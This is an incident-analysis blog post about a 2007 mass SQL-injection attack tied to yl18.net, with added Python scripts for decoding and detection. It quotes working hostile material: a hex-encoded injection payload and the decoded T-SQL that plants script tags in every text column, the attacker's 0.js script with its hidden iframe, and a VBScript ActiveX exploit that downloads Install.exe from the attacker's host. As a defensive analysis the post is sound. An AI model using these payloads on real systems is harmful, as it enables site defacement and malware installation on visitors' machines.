yl18.net: the chinese menace

This is the story of an attack I had to investigate for a client. The symptoms: mass defacement of web pages on the server; the only tool: roughly 1GB of web server log files.

The first step was to find the suspicious requests in the log files. The server administrators had reported that strange code had appeared in different pages of the database and that the string yl18.net was part of the injected data. www.yl18.net (do NOT open in a browser) is a Chinese site containing diverse stuff, including porn. :roll:

After some cat, grep and awk it was possible to spot a very suspicious query:

/image.asp?L=85';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x6400650063006C00610072
006500200040006D00200076006100720063006800610072002800380030003000300029003B00730065
007400200040006D003D00270027003B00730065006C00650063007400200040006D003D0040006D002B
0027007500700064006100740065005B0027002B0061002E006E0061006D0065002B0027005D00730065
0074005B0027002B0062002E006E0061006D0065002B0027005D003D0072007400720069006D00280063
006F006E007600650072007400280076006100720063006800610072002C0027002B0062002E006E0061
006D0065002B002700290029002B00270027003C0073006300720069007000740020007300720063003D
00220068007400740070003A002F002F0079006C00310038002E006E00650074002F0030002E006A0073
0022003E003C002F007300630072006900700074003E00270027003B0027002000660072006F006D0020
00640062006F002E007300790073006F0062006A006500630074007300200061002C00640062006F002E
0073007900730063006F006C0075006D006E007300200062002C00640062006F002E0073007900730074
00790070006500730020006300200077006800650072006500200061002E00690064003D0062002E0069
006400200061006E006400200061002E00780074007900700065003D0027005500270061006E00640020
0062002E00780074007900700065003D0063002E0078007400790070006500200061006E006400200063
002E006E0061006D0065003D0027006E00760061007200630068006100720027003B0073006500740020
0040006D003D005200450056004500520053004500280040006D0029003B00730065007400200040006D
003D0073007500620073007400720069006E006700280040006D002C0050004100540049004E00440045
0058002800270025003B00250027002C0040006D0029002C00380030003000300029003B007300650074
00200040006D003D005200450056004500520053004500280040006D0029003B00650078006500630028
0040006D0029003B00%20AS%20NVARCHAR(4000));EXEC(@S);--

Manual testing verified that the L parameter of the image.asp script was indeed vulnerable to SQL injection. Some SQL keywords can be identified in the previous command, but there is no doubt that the CAST statement is the most interesting:

Explicitly converts an expression of one data type to another. CAST and CONVERT provide similar functionality.

The syntax for the CAST command is:

CAST ( expression AS data_type [ (length ) ])

A closer look at the injected code reveals that the attack is using CAST to convert hexadecimal data into a string (AS NVARCHAR(4000)).
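As an added example (not part of the original post, and not the Morf tool the post uses), here is a small Python script that automates the grep-and-decode step: it walks web server log lines, URL-decodes them, picks out `CAST(0x... AS NVARCHAR)` literals and decodes the hex the way SQL Server would (UTF-16LE for NVARCHAR, single-byte for VARCHAR). The log lines and the short stand-in payload are constructed, and the log layout is an assumption; the real payload from the query above would decode the same way.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not taken from the post's 1GB of logs). The
# second line carries the CAST(0x...) pattern seen in the real attack, with a
# short constructed payload ("exec(@m)" in UTF-16LE) in place of the full one.
SAMPLE_LOG = """\
2007-11-05 10:14:02 GET /image.asp L=85 200
2007-11-05 10:14:09 GET /image.asp L=85';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x6500780065006300280040006D002900%20AS%20NVARCHAR(4000));EXEC(@S);-- 200
2007-11-05 10:15:11 GET /news.asp id=12 200
"""

# CAST(0x<hex> AS VARCHAR|NVARCHAR[(n)]) after URL-decoding. The declared type
# tells us how to decode the bytes: NVARCHAR is UTF-16LE, VARCHAR single-byte.
CAST_RE = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?VARCHAR)", re.I)


def decode_cast_payload(hex_digits, declared_type):
    """Turn the hex literal of a CAST(0x... AS ...) into the SQL text it hides."""
    if len(hex_digits) % 2:            # a stray trailing nibble would break fromhex()
        hex_digits = hex_digits[:-1]
    raw = bytes.fromhex(hex_digits)
    if declared_type.upper() == "NVARCHAR":
        if len(raw) % 2:               # lone trailing 0x00 byte, as in the real payload
            raw = raw[:-1]
        return raw.decode("utf-16-le", errors="replace").rstrip("\x00")
    return raw.decode("latin-1")


def find_injections(log_text):
    """Return (line_number, decoded_sql) for every line carrying a hex CAST injection."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        decoded_line = unquote(line)   # %20 etc. back to the text the server saw
        for match in CAST_RE.finditer(decoded_line):
            findings.append((lineno, decode_cast_payload(match.group(1), match.group(2))))
    return findings


if __name__ == "__main__":
    for lineno, sql in find_injections(SAMPLE_LOG):
        print(f"line {lineno}: {sql}")
```

Run it against a real log with `find_injections(open("access.log").read())`; the decoded SQL is what goes into the incident report, and the line numbers give you the timestamps and source addresses to pivot on.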

You can use a tool such as Morf, the ninja encoder to convert the hex data into the following string:

declare @m varchar(8000);
set @m='';
-- Build one UPDATE per nvarchar column of every user table (xtype='U'),
-- appending the script tag to the column's current value. The <script> tag
-- was stripped from the post by HTML rendering; it is the 0.js reference the
-- hex decodes to, and the hex reads c.name='nvarchar'.
select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+''<script src="http://yl18.net/0.js"></script>'';' from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U' and b.xtype=c.xtype and c.name='nvarchar';
-- varchar(8000) silently truncates the batch; reversing it, cutting at the
-- first ';' and reversing back discards the incomplete trailing statement.
set @m=REVERSE(@m);
set @m=substring(@m,PATINDEX('%;%',@m),8000);
set @m=REVERSE(@m);
exec(@m);

This code adds a malicious script tag to all user table objects which is in line with the behaviour reported by the server administrators.
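The last four statements of the decoded payload look odd at first sight. This added Python simulation (not from the post) shows what they are for: `select @m=@m+...` accumulates one UPDATE per column, varchar(8000) silently truncates the result, and the REVERSE / PATINDEX / REVERSE sequence cuts the batch back to its last complete statement before it is handed to exec(). The table and column names are constructed stand-ins for the sysobjects/syscolumns join.

```python
# Constructed catalogue of user tables and their nvarchar columns, standing in
# for the dbo.sysobjects / dbo.syscolumns join in the decoded payload.
SAMPLE_COLUMNS = [
    ("news", "title"),
    ("news", "body"),
    ("products", "description"),
    ("users", "bio"),
]
INJECTED_TAG = '<script src="http://yl18.net/0.js"></script>'
VARCHAR_MAX = 8000   # varchar(8000): longer concatenations are silently cut


def build_update_batch(columns, tag, limit=VARCHAR_MAX):
    """Reproduce the 'select @m=@m+...' accumulation and its silent truncation."""
    m = ""
    for table, column in columns:
        m += f"update[{table}]set[{column}]=rtrim(convert(varchar,{column}))+'{tag}';"
    return m[:limit]


def trim_to_last_statement(m):
    """REVERSE / PATINDEX('%;%') / REVERSE: keep everything up to the last ';'."""
    rev = m[::-1]
    pos = rev.find(";")          # PATINDEX is 1-based and includes the ';'; find() is 0-based
    if pos == -1:
        return ""                # no complete statement survived the truncation
    return rev[pos:][::-1]


def statements(m):
    """Split a batch into its non-empty statements (the tag itself has no ';')."""
    return [s for s in m.split(";") if s]


if __name__ == "__main__":
    # A limit of 150 cuts the batch in the middle of the second UPDATE.
    cut = build_update_batch(SAMPLE_COLUMNS, INJECTED_TAG, limit=150)
    print(repr(cut[-20:]))
    print(statements(trim_to_last_statement(cut)))
```

The trick matters to the attacker because a batch ending in a half-written UPDATE would fail to parse and nothing at all would be defaced; with the trim in place, exec() always gets a syntactically complete batch, just one covering fewer columns on large databases.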

Let's have a look at the JavaScript code, but be advised, this is not for the faint-hearted. :)

At the time of the investigation the contents of http://yl18.net/0.js looked like:-

function GetCookie (name) {
  var arg = name + "=";
  var alen = arg.length;
  var clen = document.cookie.length;
  var i = 0;
  // The loop body and the head of SetCookie were eaten by the "<" in
  // "while (i < clen)" when the post was rendered; the lines from here down
  // to "var expires" are restored from the standard cookie library this
  // script copies (the remaining functions match that library verbatim).
  while (i < clen) {
    var j = i + alen;
    if (document.cookie.substring(i, j) == arg)
      return getCookieVal (j);
    i = document.cookie.indexOf(" ", i) + 1;
    if (i == 0) break;
  }
  return null;
}

function SetCookie (name, value) {
  var argv = SetCookie.arguments;
  var argc = SetCookie.arguments.length;
  var expires = (argc > 2) ? argv[2] : null;
  var path = (argc > 3) ? argv[3] : null;
  var domain = (argc > 4) ? argv[4] : null;
  var secure = (argc > 5) ? argv[5] : false;
  document.cookie = name + "=" + escape (value) +
    ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
    ((path == null) ? "" : ("; path=" + path)) +
    ((domain == null) ? "" : ("; domain=" + domain)) +
    ((secure == true) ? "; secure" : "");
}

function DeleteCookie (name) {
  var exp = new Date();
  exp.setTime (exp.getTime() - 1);
  // This cookie is history
  var cval = 0;
  document.cookie = name + "=" + cval + "; expires=" + exp.toGMTString();
}

// Cookie lifetime: expDays * 8 hours, so a victim is hit again after 8 hours.
var expDays = 1;
var exp = new Date();
exp.setTime(exp.getTime() + (expDays*8*60*60*1000));

// Per-visitor counter: returns 1 on the first visit, otherwise the incremented count.
function amt(){
  var count = GetCookie('count');
  //var count;
  //alert(count);
  //count = null;
  if(count == null) {
    SetCookie('count','1')
    return 1
  }
  else{
    var newcount = parseInt(count) + 1;
    if(newcount<2) count=1;
    SetCookie('count',newcount,exp);
    //DeleteCookie('count')
    return newcount
  }
}

function getCookieVal(offset) {
  var endstr = document.cookie.indexOf (";", offset);
  if (endstr == -1)
    endstr = document.cookie.length;
  return unescape(document.cookie.substring(offset, endstr));
}

function sethome(){
  // The iframe markup was stripped when the post was rendered; it is restored
  // here from the post's own description (a hidden iframe loading 0.html). The
  // zero-size attributes are assumed; they match the iframes used in 0.html.
  document.write('<iframe src="http://www.yl18.net/0.html" height=0 width=0></iframe>');
}

// Only the first visit within the cookie's lifetime injects the iframe.
if(amt()==1)
{
  sethome()
}

Bottom line: on the first visit (while the count cookie does not exist yet) the sethome() function is executed and a new file is requested, http://www.yl18.net/0.html, inside an iframe HTML tag.

The new file contains two sets of instructions as you can see below:-

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=big5">
<META content="MSHTML 6.00.2900.3059" name=GENERATOR></HEAD>
<BODY>
</BODY></HTML>
<iframe src="614.htm" height=0 width=0></iframe>
<iframe src="Yahoo_.htm" height=0 width=0></iframe> 
<iframe src="_Opera.htm" height=0 width=0></iframe>
<iframe src="614_.htm" height=0 width=0></iframe>
<iframe src="_Opera2.htm" height=0 width=0></iframe>
<iframe src="a2.html" height=0 width=0></iframe>

</BODY></HTML>
<script src='http://s93.cnzz.com/stat.php?id=654056&web_id=654056&show=pic1' language='JavaScript' charset='gb2312'></script>

Let's talk first about the last line of the file: a new script tag that points to stat.php with a set of parameters. So our friendly Chinese hackers are taking the opportunity not only to infect vulnerable machines but also to add a few clicks to their statistics!

It is a shame that I am not fluent in Chinese; however, using the prediction powers of the mystical smoking head of ‘Bob’ I was able to find out which page the attackers were voting for.

By browsing to http://www.cnzz.com/stat/website.php?web_id=654056 you can identify the following URL: http://www.yl18.net/a.htm. This is a nice trick: the attackers were using the clicks provided by the victims of the 0.html page to increase the ranking of a.htm (presumably another malicious page that will use its clicks to increase the rating of 0.html).

Anyway, back to the other lines of 0.html: 614.htm, Yahoo_.htm, _Opera.htm, 614_.htm, _Opera2.htm and a2.html are all malicious pages that try to exploit different vulnerabilities, including the Microsoft ADO DB ActiveX exploit of 2006 and exploits for the Yahoo Bar component. The exploits’ main aim was to download binary files, execute them and install them as resident applications.

It is interesting to note that the Internet Archive tells us that the history of yl18.net attacks dates back to 2005.

One other interesting thing is that in the middle of last week (7th of November 2007) the malicious files on the server were modified. http://yl18.net/0.js was not pointing to 0.html anymore; it pointed instead to a brand new file: EDImage.htm.

The contents of the file were also malicious:-

<object classid='clsid:F685AFD8-A5CC-410E-98E4-BAA1C559BA61' id='test'></object>
<script language='vbscript'>
On Error Resume Next
test.HttpDownloadFile "http://www.yl18.net/0/Install.exe", "c:explorer.exe"
</script>

The interesting bit is that the previous code exploits a vulnerability released only five days before, on the 2nd of November, by shinnai. As described in the advisory, this code exploits an insecure download method in the EDraw Flowchart ActiveX Control (EDImage.ocx v. 2.0.2005.1104). Vulnerable software: Windows XP Professional SP2, fully patched, with Internet Explorer 7. :!:
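Pulling together the indicators from the 0.js, 0.html and EDImage.htm pages above, here is an added Python scanner (not the post's code) that flags the three patterns this incident used when run over stored page content or a database export: a script tag sourced from a known-bad host, zero-size iframes, and an ActiveX object tag paired with a VBScript HttpDownloadFile call. The HTML samples are constructed to mimic the pages described in the post, and the host list is an assumption to be replaced with your own.

```python
import re

# Constructed HTML samples modelled on the pages described in the post (not
# copies of the attacker's files): one clean page and one carrying the three
# injection patterns seen in this incident.
CLEAN_PAGE = """<html><body><h1>Products</h1>
<iframe src="/help.htm" width=300 height=200></iframe>
</body></html>"""

TAINTED_PAGE = """<html><body><p>Latest news</p>
<script src="http://yl18.net/0.js"></script>
<iframe src="614.htm" height=0 width=0></iframe>
<iframe src="Yahoo_.htm" height=0 width=0></iframe>
<object classid='clsid:F685AFD8-A5CC-410E-98E4-BAA1C559BA61' id='test'></object>
<script language='vbscript'>
On Error Resume Next
test.HttpDownloadFile "http://www.yl18.net/0/Install.exe", "c:explorer.exe"
</script>
</body></html>"""

# Hosts that appeared in this incident; assumed starting list, extend from your own intel.
KNOWN_BAD_HOSTS = {"yl18.net", "www.yl18.net"}

SCRIPT_SRC_RE = re.compile(r"""<script[^>]+src=['"]?(?:https?:)?//([^/'"\s>]+)""", re.I)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
OBJECT_CLSID_RE = re.compile(r"""<object[^>]+classid=['"]?clsid:([0-9A-F-]{36})""", re.I)
VBS_DOWNLOAD_RE = re.compile(
    r"""<script[^>]*language=['"]?vbscript[^>]*>.*?HttpDownloadFile""", re.I | re.S)


def _dimension(attrs, name):
    """Integer value of a height=/width= attribute, or None if absent."""
    m = re.search(rf"""\b{name}\s*=\s*['"]?(\d+)""", attrs, re.I)
    return int(m.group(1)) if m else None


def scan_html(html):
    """Return (indicator, detail) pairs for the injection patterns found in html."""
    findings = []
    for m in SCRIPT_SRC_RE.finditer(html):            # external script from a known-bad host
        if m.group(1).lower() in KNOWN_BAD_HOSTS:
            findings.append(("script_src_known_bad_host", m.group(1)))
    for m in IFRAME_RE.finditer(html):                # iframes the user cannot see
        attrs = m.group(1)
        if _dimension(attrs, "height") == 0 and _dimension(attrs, "width") == 0:
            src = re.search(r"""src=['"]?([^'"\s>]+)""", attrs, re.I)
            findings.append(("hidden_iframe", src.group(1) if src else ""))
    for m in OBJECT_CLSID_RE.finditer(html):          # ActiveX instantiation by CLSID
        findings.append(("activex_object", m.group(1).upper()))
    if VBS_DOWNLOAD_RE.search(html):                  # VBScript driving a download method
        findings.append(("vbscript_download", "HttpDownloadFile"))
    return findings


if __name__ == "__main__":
    for indicator, detail in scan_html(TAINTED_PAGE):
        print(f"{indicator}: {detail}")
```

Feed it the nvarchar columns the UPDATE batch above would have touched (dumped to text) and you get a list of the tainted rows to clean; the CLSID indicator is also the value to put on a kill-bit list for browsers in the estate.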

So we had all better keep an eye on yl18.net, because apparently the Chinese menace is still evolving.


One Response to “yl18.net: the chinese menace”

  1. Mike Says:

    Hi, I also got that attack on my server on 7th Dec.
    I just found that some of my tables have that